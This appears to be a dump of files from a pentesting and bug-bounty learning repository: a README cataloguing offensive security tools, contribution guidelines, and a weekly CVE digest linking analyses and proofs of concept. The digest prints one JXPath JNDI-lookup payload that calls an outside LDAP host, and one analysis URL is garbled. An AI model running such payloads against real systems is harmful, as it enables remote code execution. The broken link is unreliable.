A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional \"con\" in that it is often one of many steps in a more complex fraud scheme. The term \"social engineering\" as an act of psychological manipulation of a human, is also associated with the social sciences, but its usage has caught on among computer and information security professionals. [Wikipedia](https://en.wikipedia.org/wiki/Social_engineering_(security))\n\n**Threat analyst**: A threat hunter, also called a cybersecurity threat analyst, is a security professional or managed service provider (MSP) that proactively uses manual or machine-assisted techniques to detect security incidents that may elude the grasp of automated systems. Threat hunters aim to uncover incidents that an enterprise would otherwise not find out about, providing chief information security officers (CISOs) and chief information officers (CIOs) with an additional line of defense against advanced persistent threats (APTs). [SearchCIO](https://searchcio.techtarget.com/definition/threat-hunter-cybersecurity-threat-analyst)\n\n**Site reliability engineer (SRE)**:\n\n**Pipeline**:\n\n**CI/CD pipeline**:\n\n**DevOps**:\n\n**DevSecOps**:\n\n\n\n([Table of Contents](#table-of-contents))\n\n## Difference between practising penetration testing and ethical hacking\n\nA black hat is practicing penetration testing, but unlike a white hat, this is not ethical hacking. Ethical hacking is about finding vulnerabilities and improving the security of a system. An ethical hacker is the ultimate security professional. Ethical hackers know how to find and exploit vulnerabilities and weaknesses in various systems, just like a malicious hacker (a black hat hacker). In fact, they both use the same skills; however, an ethical hacker uses those skills in a legitimate, lawful manner to try to find vulnerabilities and fix them before the bad guys can try to break in. 
An ethical hacker is basically a white hat hacker.\n\n\n##  Difference between SRE and Devops\n\n##  **Difference between DAST, SAST and IAST**\n\n([Table of Contents](#table-of-contents))\n\n# Languages\n\nLearning programming is the very first way to start learning about security. There are a lot of languages; most people start with Python, as it is the easiest and the most popular one. PHP and Go are less popular for writing security-related code, but any of these can still be used in such a context. Bash and Powershell are mostly about scripting and writing simple CLI applications.\n\nSince not all languages work the same way, you need to look at how they work and what you want to learn. For example, C++ and Java are compiled, while PHP and Python are interpreted languages. This definitely changes what you would use them for. Each language also has its own design patterns.\n\n### Scripting\n\n- Bash\n- Powershell\n\n### Software & mobile apps\n\n- JavaScript\n- Java\n- Swift\n- C / C++ / C#\n\n### General purpose\n\n- Go\n- [Python](https://github.com/dloss/python-pentest-tools)\n- Ruby\n- Perl\n- PHP\n\n([Table of Contents](#table-of-contents))\n\n# Content Management Systems\n![image](https://user-images.githubusercontent.com/25515871/179156778-46da58f4-8531-46ee-93ef-068a9501f789.png)\n\nThese are the most used Content Management Systems (CMS). See a complete list [here](https://en.wikipedia.org/wiki/List_of_content_management_systems).\n\n# SERVER : A server is a central repository or the part of web hosting infrastructure that hosts websites.\n\t\t\n## **1. Web Server:**\n    Web server will receive all the requests sent by visitors visiting your website and also forward only the business requests to application server.       \n\n\t    The static assets (like CSS, JS components , Web components eg Common images, resources files and html components) will be served from your web server itself. 
\n\t    Web server runs on Microsoft IIS:ASP(.NET), Apache: Php/CGI, Apache Tomcat: Servlet, Nginx, HTTPD ,Jetty: Servlet\n\t    or even Python's Simple HTTPServer etc.\n\t    Web servers primarily respond to HTTP / HTTPS requests, however they aren't restricted to that protocol only. \n\t    They may provide alternative protocol support like RMI/RPC.\n\n**Front End (Web UI) <-> BackEnd (API) <-> Web server (web page and graphics files) <-> Load Balancer  <-> Application Server (Template pages, code & data)  <->  DataBase (Couch DB + MySql + Elastic DB + MongoDB + Firebase )**\n\n\n## **2. Application server:**\n\n     Application server is the server that works between the Web server and the database server. It basically generates dynamic content/assets by executing server-side code (eg JSP, servlet or EJB), \n     manages (transaction support, messaging support etc), processes the data (connection pooling, object pooling etc) \n     and hosts the application; the application server is responsible only for business requests (like Login, Fetching details etc.)\n\t\t\n\t\t○ MTS: COM+\n\t\t○ Email server\n\t\t○ WAS: EJB\n\t\t○ JBoss: EJB\n\t\t○ WebLogic Application Server: EJB\n\t\t○ Google maps servers\n\t\t○ Google search servers\n\t\t○ Google docs servers\n\t\t○ Microsoft 365 servers\n\t\t○ Microsoft computer vision servers for AI.\n\t\t\n    • Application servers \n      Application Server can do whatever a Web Server is capable of and respond to any number of protocols depending on the application business logic.\n\n## **3. Database Server:**\n\n      Database server handles database queries and it can only be accessed by the application server. It runs on MySQL, PostgreSQL, MariaDB, etc. Database servers use protocols like ODBC, JDBC, etc.\n\n**Please note:**\n\n\t• Web Server is designed to serve HTTP static Content like HTML, images etc. 
and for the dynamic content have plugins to support \n\tscripting languages like Perl, PHP, ASP, JSP etc\n\t\n\t• Web container is a part of Web Server and the Web Server is a part of Application Server.\n\t\n\t• A Web Server in Java is also known as a web container or a servlet container which has a limited set of Java EE features like Servlets, JSP etc. \n\tEx: Apache Tomcat.\n\t\n\t• An Application Server has a web container in it as well as full Java EE features like Java Mail Service, JPA, JSF etc.\n\tEx: Glassfish, Apache TomEE, JBoss or Wildfly (new name), IBM WebSphere etc.\n\t\n\t• If you have a Java application with just JSP and Servlet to generate dynamic content then you need web containers like Apache Tomcat or Jetty. \n\tWhile, if you have a Java EE application using EJB, distributed transactions, messaging and other fancy features, then \n\tyou need a full fledged application server like JBoss, WebSphere or Oracle's WebLogic.\n\t\n\t• The use of a Load Balancer is to distribute the load between multiple application servers. \n\t\n\t• Application server can only be accessed via web server, database server can only be accessed by application server. 
\n\t\n\t• If you want to solve web server and application server purposes in one server, I would recommend \n\tVPS hosting servers and dedicated hosting servers. It is because they host volumes of web projects and applications with a higher uptime.\n\nFrom <https://www.quora.com/Whats-the-diference-between-an-application-server-and-a-web-server> \n https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Pages_sites_servers_and_search_engines\n\n\n([Table of Contents](#table-of-contents))\n\n# cloud servers\n\n![cloud-provider](https://user-images.githubusercontent.com/25515871/182293888-62d7d7be-0f8a-4220-88f9-36db7be3ac28.png)\n\n\n# Basic steps of pen testing\n\n<p align=\"center\">\n    <img src=\"https://www.tutorialspoint.com/penetration_testing/images/penetration_testing_method.jpg\">\n</p>\n\n*Source: [tutorialspoint](https://www.tutorialspoint.com/penetration_testing/index.htm)*\n\n[Read more about pen testing methodology](https://www.tutorialspoint.com/penetration_testing/penetration_testing_method.htm)\n\n([Table of Contents](#table-of-contents))\n\n# Tools by category\n\nA more complete list of tools can be found on [Kali Linux official website](https://tools.kali.org/tools-listing).\n\n#### :male_detective: Information Gathering\n\nInformation Gathering tools allow you to collect information and data about services and users. Check information about a domain, IP address, phone number or an email address.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [theHarvester](https://github.com/laramies/theHarvester)      | **Python** | `Linux/Windows/macOS` | E-mails, subdomains and names Harvester. |\n| [CTFR](https://github.com/UnaPibaGeek/ctfr)      | **Python** | `Linux/Windows/macOS` | Abusing Certificate Transparency logs for getting HTTPS websites subdomains. 
|\n| [Sn1per](https://github.com/1N3/Sn1per)      | **bash** | `Linux/macOS` | Automated Pentest Recon Scanner. |\n| [RED Hawk](https://github.com/Tuhinshubhra/RED_HAWK)      | **PHP** | `Linux/Windows/macOS` | All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers. |\n| [Infoga](https://github.com/m4ll0k/Infoga)      | **Python** | `Linux/Windows/macOS` | Email Information Gathering. |\n| [KnockMail](https://github.com/4w4k3/KnockMail)      | **Python** | `Linux/Windows/macOS` | Check if email address exists. |\n| [a2sv](https://github.com/hahwul/a2sv)      | **Python** | `Linux/Windows/macOS` | Auto Scanning to SSL Vulnerability. |\n| [Wfuzz](https://github.com/xmendez/wfuzz)      | **Python** | `Linux/Windows/macOS` | Web application fuzzer. |\n| [Nmap](https://github.com/nmap/nmap)      | **C/C++** | `Linux/Windows/macOS` | A very common tool. Network host, vuln and port detector. |\n| [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga)      | **Go** | `Linux/macOS` | An OSINT framework for phone numbers. |\n\n#### :lock: Password Attacks\n\nCrack passwords and create wordlists.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [John the Ripper](https://github.com/magnumripper/JohnTheRipper)      | **C** | `Linux/Windows/macOS` | John the Ripper is a fast password cracker. |\n| [hashcat](https://github.com/hashcat/hashcat)      | **C** | `Linux/Windows/macOS` | World's fastest and most advanced password recovery utility. |\n| [Hydra](https://github.com/vanhauser-thc/thc-hydra)      | **C** | `Linux/Windows/macOS` | Parallelized login cracker which supports numerous protocols to attack. |\n| [ophcrack](https://gitlab.com/objectifsecurite/ophcrack)      | **C++** | `Linux/Windows/macOS` | Windows password cracker based on rainbow tables. 
|\n| [Ncrack](https://github.com/nmap/ncrack)      | **C** | `Linux/Windows/macOS` | High-speed network authentication cracking tool. |\n| [WGen](https://github.com/agusmakmun/Python-Wordlist-Generator)      | **Python** | `Linux/Windows/macOS` | Create awesome wordlists with Python. |\n| [SSH Auditor](https://github.com/ncsa/ssh-auditor)      | **Go** | `Linux/macOS` | The best way to scan for weak ssh passwords on your network. |\n\n###### :memo: Wordlists\n\n| Tool        | Description    |\n| ----------- |----------------|\n| [All Wordlist at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)   | Wordlists sorted by probability originally created for password generation and testing. |\n\n#### :globe_with_meridians: Wireless Testing\n\nUsed for intrusion detection and wifi attacks.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [Aircrack](https://github.com/aircrack-ng/aircrack-ng)      | **C** | `Linux/Windows/macOS` | WiFi security auditing tools suite. |\n| [bettercap](https://github.com/bettercap/bettercap)      | **Go** | `Linux/Windows/macOS/Android` | bettercap is the Swiss army knife for network attacks and monitoring. |\n| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin)      | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |\n| [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)      | **Shell** | `Linux/Windows/macOS` | This is a multi-use bash script for Linux systems to audit wireless networks. |\n| [Airbash](https://github.com/tehw0lf/airbash)      | **C** | `Linux/Windows/macOS` | A POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing. 
|\n\n#### :wrench: Exploitation Tools\n\nAccess systems and data with service-oriented exploits.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [SQLmap](https://github.com/sqlmapproject/sqlmap)      | **Python** | `Linux/Windows/macOS` | Automatic SQL injection and database takeover tool. |\n| [XSStrike](https://github.com/UltimateHackers/XSStrike)      | **Python** | `Linux/Windows/macOS` | Advanced XSS detection and exploitation suite. |\n| [Commix](https://github.com/commixproject/commix)      | **Python** | `Linux/Windows/macOS` | Automated All-in-One OS command injection and exploitation tool. |\n\n#### :busts_in_silhouette: Sniffing & Spoofing\n\nListen to network traffic or fake a network entity.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [Wireshark](https://www.wireshark.org)      | **C/C++** | `Linux/Windows/macOS` | Wireshark is a network protocol analyzer. |\n| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin)      | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |\n| [Zarp](https://github.com/hatRiot/zarp)      | **Python** | `Linux/Windows/macOS` | A free network attack framework. |\n\n#### :rocket: Web Hacking\n\nExploit popular CMSs that are hosted online.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [WPScan](https://github.com/wpscanteam/wpscan)      | **Ruby** | `Linux/Windows/macOS` | WPScan is a black box WordPress vulnerability scanner. |\n| [Droopescan](https://github.com/droope/droopescan)      | **Python** | `Linux/Windows/macOS` | A plugin-based scanner to identify issues with several CMSs, mainly Drupal & Silverstripe. 
|\n| [Joomscan](https://github.com/rezasp/joomscan)      | **Perl** | `Linux/Windows/macOS` | Joomla Vulnerability Scanner. |\n| [Drupwn](https://github.com/immunIT/drupwn)      | **Python** | `Linux/Windows/macOS` | Drupal Security Scanner to perform enumerations on Drupal-based web applications. |\n| [CMSeek](https://github.com/Tuhinshubhra/CMSeek)      | **Python** | `Linux/Windows/macOS` | CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 130 other CMSs. |\n\n#### :tada: Post Exploitation\n\nExploits for after you have already gained access.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [TheFatRat](https://github.com/Screetsec/TheFatRat)      | **C** | `Linux/Windows/macOS` | Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack, dll. |\n\n### pen-testing Frameworks\n\nFrameworks are packs of pen testing tools with custom shell navigation and documentation.\n\n| Tool        | Language           | Support  | Description    |\n| ----------- |-------------------------|----------|----------------|\n| [Operative Framework](https://github.com/graniet/operative-framework)      | **Python** | `Linux/Windows/macOS` | Framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules. |\n| [Metasploit](https://github.com/rapid7/metasploit-framework)      | **Ruby** | `Linux/Windows/macOS` | A penetration testing framework for ethical hackers. |\n| [cSploit](https://github.com/cSploit/android)      | **Java** | `Android` | The most complete and advanced IT security professional toolkit on Android. |\n| [radare2](https://github.com/radare/radare2)      | **C** | `Linux/Windows/macOS/Android` | Unix-like reverse engineering framework and commandline tools. 
|\n| [Wifiphisher](https://github.com/wifiphisher/wifiphisher)      | **Python** | `Linux` | The Rogue Access Point Framework. |\n| [Beef](https://github.com/beefproject/beef)      | **Javascript** | `Linux/Windows/macOS` | The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. |\n| [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF)      | **Python** | `Linux/Windows/macOS` | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. |\n| [Burp Suite](https://portswigger.net/burp)      | **Java** | `Linux/Windows/macOS` | Burp Suite is a leading range of cybersecurity tools, brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. **This tool is not free and open source** |\n\n([Table of Contents](#table-of-contents))\n\n## Books / Manuals\n\n- [Advance Penetration Testing by Wil Alsoop, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)\n- [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)\n- [The Pentester BluePrint: Starting a Career as an Ethical Hacker](https://www.amazon.in/dp/1119684307/ref=cm_sw_r_cp_apa_i_XMCdGbG3PV2XD) (2014)\n- [Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X) - [PDF](https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf) (2017)\n- [Cybersecurity - Attack and Defense Strategies](https://www.amazon.com/Cybersecurity-Defense-Strategies-Infrastructure-securit/dp/1788475291) (2018)\n- [Android Hacker's Handbook by Joshua J. 
Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) (2009)\n- [Social Engineering : The Art of Human Hacking](https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539) (2010)\n- [The Hackers Playbook 2 by Peter Kim](https://amzn.to/2ObGqkU)\n\n## Discussions (Updating Soon)\n\n- [Reddit/HowToHack](https://www.reddit.com/r/HowToHack) Learn and ask about hacking, security and pen testing.\n- [Reddit/hacking](https://www.reddit.com/r/hacking) Discuss hacking and web security.\n- [ax0nes](https://ax0nes.com/) Hacking, security, and software development forum.\n- [0Day.rocks on discord](https://discord.gg/WmYzJfD) Discord server about the 0day.rocks blog for technical and general InfoSec/Cyber discussions & latest news.\n- [Reddit/AskNetsec](https://www.reddit.com/r/AskNetsec/) Discuss network security, ask professionals for advice about jobs and stuff.\n\n## Security Advisories\n\n- [CVE: For publicly known cybersecurity vulnerabilities.](http://cve.mitre.org/)\n- [CWE: For software weaknesses and vulnerabilities](http://cwe.mitre.org/)\n- [NVD: Largest publicly available source of vulnerability intelligence.](http://web.nvd.nist.gov/)\n- [OWASP: Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.\n- [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.\n- [PTES: Penetration Testing Execution Standard](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.\n- [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability 
analysts and penetration testers alike.\n- [Hackerone reports](https://h1.security.nathan.sx/index.html)\n- [Pentester.land](https://pentester.land/list-of-bug-bounty-writeups.html)\n\n## Must Checkout \n\n- [Awesome Pentesting](https://github.com/enaqx/awesome-pentest/blob/master/README.md)\n- [Devbreak on Twitter](https://twitter.com/DevbreakFR)\n- [The Life of a Security Researcher](https://www.alienvault.com/blogs/security-essentials/the-life-of-a-security-researcher)\n- [Find an awesome hacking spot in your country](https://github.com/diasdavid/awesome-hacking-spots)\n- [Awesome-Hacking Lists](https://github.com/Hack-with-Github/Awesome-Hacking/blob/master/README.md)\n- [Crack Station](http://crackstation.net/)\n- [Exploit Database](http://www.exploit-db.com/)\n- [Hackavision](http://www.hackavision.com/)\n- [Hackmethod](https://www.hackmethod.com/)\n- [Packet Storm Security](http://packetstormsecurity.org/)\n- [SecLists](http://seclists.org/)\n- [SecTools](http://sectools.org/)\n- [Smash the Stack](http://smashthestack.org/)\n- [Don't use VPN services](https://gist.github.com/joepie91/5a9909939e6ce7d09e29)\n- [How to Avoid Becoming a Script Kiddie](https://www.wikihow.com/Avoid-Becoming-a-Script-Kiddie)\n- [2017 Top 10 Application Security Risks](https://www.owasp.org/index.php/Top_10-2017_Top_10)\n- [Starting in cybersecurity ?](https://blog.0day.rocks/starting-in-cybersecurity-5b02d827fb54)\n\n\n\n([Table of Contents](#table-of-contents))\n\n# License\n\nThis repository is under MIT license.\n\n([Table of Contents](#table-of-contents))\n"
  },
  {
    "path": "ResetCybersecuirty/CONTRIBUTING.md",
    "content": "# Contribution Guidelines\n\nPlease note that this project is released with a **No Code or Low Code contribution**. \n\nContributing to open source isn’t just for technical folks who want to write code. There are lots of opportunities to use your professional skills in support of open-source projects. ResetHacker Community making a point to encourage contributions that require some technical experience or none at all. No matter your experience, you can Join and contribute in ResetHacker!\n\nRESETHACKER welcomes people of any experience level to participate,Join, create and low-code and non-code contributions are fantastic choices for folks who don’t have a lot of technical knowledge. Here are some examples of ways you can contribute to open-source projects:\n\t\n| Writing | Technical documentation | Translating & Copy editing |\n\n\n\n|        | Topics          | Low code  | Non-Code    |\n| ----------- |-------------------------|----------|----------------|\n| 1.      | **Writing** | `Technical documentation` | Translating & Copy editing. |\n| 2.      | **Design** | `Testing` | User experience testing, Graphic design and Video production. |\n| 3.      | **Advocacy** | `Talks or presentations, Technical blog posts, Podcast & Case studies` | Social media & Blog posts. |\n\n## Contributors submitting low-code or no-code content by Submitting a pull request\n\n<br>\n\n- Fork this repository\n- Clone this repository\n- Add or Make the changes\n- Add your name & github link to [Contributors](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Contributors.md)\n- Wait for your pull request to be reviewed and merged!  \n\n\n## Updating your Pull Request\n\nSometimes, a maintainer of an ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.\n\n"
  },
  {
    "path": "ResetCybersecuirty/CVE's/CVE_Assests/Beta.md",
    "content": "# Security Patched,  CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\" /> </p>\n<details>\n <summary><b>  \nA collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE. \n  \n  > Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities. \n  \n  \n  - Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow : \n  \n</b></summary>\n\n        \n        # Security Patched within a Week:   Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :\n        # CVE Analysis:                     CVE analysis and poc for analysis.\n        # Poc Exploit :                     Tracking the recetly discovered PoC of old & new CVE. 
\n        \n        - [CVE]\n           - Target/Product: ** **\n           - Affected Version/ Patched :\n           - Description/Issue/Flaw :\n        \n</details>\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.\n\n \n      Security Patched within a Week: Latest vulnerabilities that have been patched within the last week (12th Oct - 18th October 2022),                                      \n                                      featuring releases from Mozilla, Microsoft, Jenkins, GitHub, Cisco, Linux (Ubuntu 22.04, 20.04 & 18.04 LTS) etc.\n        \n      CVE:ANALYSIS & POC:             CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969                                                \n                                      CVE-2022-3236 & CVE-2022-36966. \n\n         \n      CVE POC (0-Day):                7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,                                                                     \n                                      CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).\n                                    \n<details>\n<summary>\nSecurity Patched within a Week:\n \n > We track the latest Security Advisories of top vendors and filter out the high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security issues (Severity : Critical or High) that have been patched by top vendors in the last week. If you're using any of the old versions of the mentioned vendors' products, an attacker could potentially exploit them, for example by tricking you into opening a specially crafted website in a browsing context, so we highly recommend **upgrading or updating vendor products from the original source.***\n \n - **Mozilla 
security Advisories** : \n   - Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.\n \n - **Jenkins security Advisories** : \n   - This week Jenkins announced [vulnerabilities in multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice is to follow the advisory and update the affected plugins.\n \n - **[Cisco security Advisories](https://tools.cisco.com/security/center/publicationListing.x)** : \n   - Cisco has released security updates for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n \n - **GitHub security Advisories** : \n   - [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)\n   - [run-terraform allows for RCE via terraform plan ](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)\n   - [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)\n \n - Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages. 
We highly recommend updating and upgrading these packages.\n   - **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library.\n\n   - **Ubuntu 20.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.\n\n   - **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.\n\n - **Microsoft** \n   - Microsoft has released a security advisory to provide information about a vulnerability that exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. 
This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v\n     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9\n     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9\n \n - **CISA Advisories**\n   > CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.\n     \n     •    ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)\n     •    ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)\n     •    ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)\n\n</details>\n\n<details>\n<summary>\nCVE Analysis, writeups & reports: (6 CVE analyses in the last week)\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.  
\n</summary>\n \n  - [Analysis: CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVtechnical-deep-dive-cve-2022-40684/)\n   \n     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n     - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n     - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n     - Vendor : **Fortinet FortiGate**\n     - Affected :  FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n                          \n              \n   - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352 ](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/)                   \n                                     \n       - Target/Product: **Zimbra**\n       - Description/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. 
This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n   - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n        - [PoC  CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n        - Payload : [jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");]\n        - Target : **Apache Commons JXPath**\n        - Description : This vulnerability affects the Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including the latest version) are affected by this vulnerability. \n                                    \n   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)                                         \n       - [Analysis:Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n       - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n       - [Tool : 